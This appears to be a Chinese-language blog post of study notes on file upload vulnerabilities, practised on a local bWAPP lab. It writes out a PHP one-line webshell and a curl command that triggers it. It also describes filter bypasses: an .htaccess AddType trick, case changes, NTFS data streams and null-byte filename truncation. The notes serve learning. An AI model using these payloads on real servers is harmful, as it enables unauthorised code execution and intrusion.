首页 » web安全学习笔记

web安全学习笔记

常见web工具:

burpsuite:通过代理渗透,可重放HTTP请求,来分析HTTP响应

curl:通过url方式传输数据,可用于抓取页面(执行请求),监控网络等等

postmain

hackbar quantum

wappalyzer

文件上传漏洞:没有足够的安全约束的情况下,允许上传恶意文件,例如恶意脚本,webshell等等

文件上传漏洞关键点在于绕过

由于法律限制的原因,禁止对其他网站非法攻击,因此需要在本地或者在自己的服务器上建立靶场渗透环境,这边使用的是bwapp(全称为buggy web Application)

这边使用的是docker运行bwapp,也可以下载bwapp,来自己搭建(https://sourceforge.net/projects/bwapp/files/

docker pull raesene/bwapp

docker run -d -p 0.0.0.0:80:80 raesene/bwapp

访问127.0.0.1/install.php

点击here来初始化,或者直接访问127.0.0.1/install.php?install=yes

创建账号信息,点击new user,或者直接访问127.0.0.1/user_new.php

点击login,或者直接访问127.0.0.1/login.php,根据刚才的账号信息进行登录

简单接触文件上传漏洞

chose your bug选择unrestricted File Upload(未经严格审记的文件上传),安全级别选择low(set your security level)

上传一句话木马,创建shell.php文件,添加<?php @eval($_POST["test"])?>

通过curl触发,执行curl -d 'test=echo getcwd();' http://127.0.0.1/images/shell.php

可以看到成功触发shell.php,并且服务器返回了当前执行的目录

后缀名绕过

安全级别选择medium(set your security level)

常见后缀名验证方式有,黑名单(禁止哪些后缀上传),白名单(只允许哪些后缀上传)

这里的靶场环境的web server为Apache,因此需要了解Apache解析器模块

.htaccess绕过,当黑名单没有限制上传.htaccess文件时,并且web sever也支持.htaccess时

上传.htaccess文件,内容为:AddType application/x-httpd-php jpg

上传木马,shell.jpg

AddType application/x-httpd-php jpg的意思是,jpg文件按照php文件的方式解析

大小写绕过

大小写用于Windows平台环境下,在Windows中,大小写是不敏感的,而在Linux环境下,大小写是敏感的

Windows文件流绕过

利用windows平台的NTFS文件系统的文件流特性,设置文件时,默认使用未命名的文件流,但是也可以创建其他命名的文件流

例如:

echo hallo,word > hallo.txt:a.txt
echo hallo > hallo.txt
echo 666 > hallo.txt::$data

第一个例子中,hallo,word并没有写入到hallo.txt,而是写入到了hallo.txt下的a.txt文件流中

第三个例子中,666写入到了hallo.txt默认文件流中

针对于白名单进行绕过

截断绕过(环境要求:php>5.3.42,magic_quotes_gpc关闭)

搭配burpsuite来拦截http请求

上传shell.php,通过拦截修改请求报文,修改为shell.php$00.jpg

$00在url中会解析为0,而在ASCII中0又表示为字符串结束,因此当url出现$00时,表示字符串读取结束

因此在上传shell.php$00.jpg时,对于先上传后检测的服务端来说,实质上传的是shell.php

没有了

添加新评论